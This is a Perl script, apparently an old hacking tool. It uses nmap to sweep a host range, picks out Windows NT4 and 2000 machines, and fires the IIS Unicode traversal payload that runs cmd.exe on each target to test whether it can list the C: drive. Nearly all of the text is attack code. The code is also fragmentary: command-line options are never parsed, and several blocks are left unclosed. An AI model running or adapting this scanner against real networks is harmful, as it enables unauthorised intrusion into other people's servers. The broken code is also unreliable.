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IIS unicode bug scanner

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# uni-test.pl
# this is a test program and should be used for educational purposes ONLY!
# NOTE: this was written on a RH Linux6.2 X86 based system.
# you will also need to DL and compile the LWP::Simple.pm module for perl

use LWP::Simple;
use Getopt::Std;

# here goes nothing...
if ( $args{t} ) {
$target = $args{t};
} else {
if ( $args{"?"} ) {
print "Running nmap...\n";
if ( $args{v} ) {
system("nmap -sS -p 80 -O $target -oM /tmp/targetnet");
} else {
system("nmap -sS -p 80 -O $target -oM - > /tmp/targetnet");
open(TARGETNET, "/tmp/targetnet") || die "Cannot open file: /tmp/targetnet";
print "Please hold checking all servers in list\n";
print "----------------------------------------\n\n";
while (<TARGETNET>) {
(/^\n/) && next;
(/Starting nmap/) && next;
(/^\#/) && next;
if ( /^Host: ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*?OS: (.*)/ ) {
$ipaddress = $1;
$osguess = $2;
if ( $osguess =~ /NT4/ || $osguess =~ /Windows 2000/ ) {
print "Checking $ipaddress for uni-code exploit\n";
$content = get("http://$ipaddress/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\");
if ( $content =~ /Directory of c\:\\/ ) {
print "$ipaddress is vulnerable\n";
} else {
warn "Cannot parse: $_";

sub usage {
print <<USAGE;
Usage: perl uni-test.pl [-v?] -t <target host/net>
-v Verbose ( Show nmap output )
-? Show this screen
-t <target> <target> is the nmap host or range you would like to scan

Note: This program requires you to be root, and for you to have the program NMAP installed.


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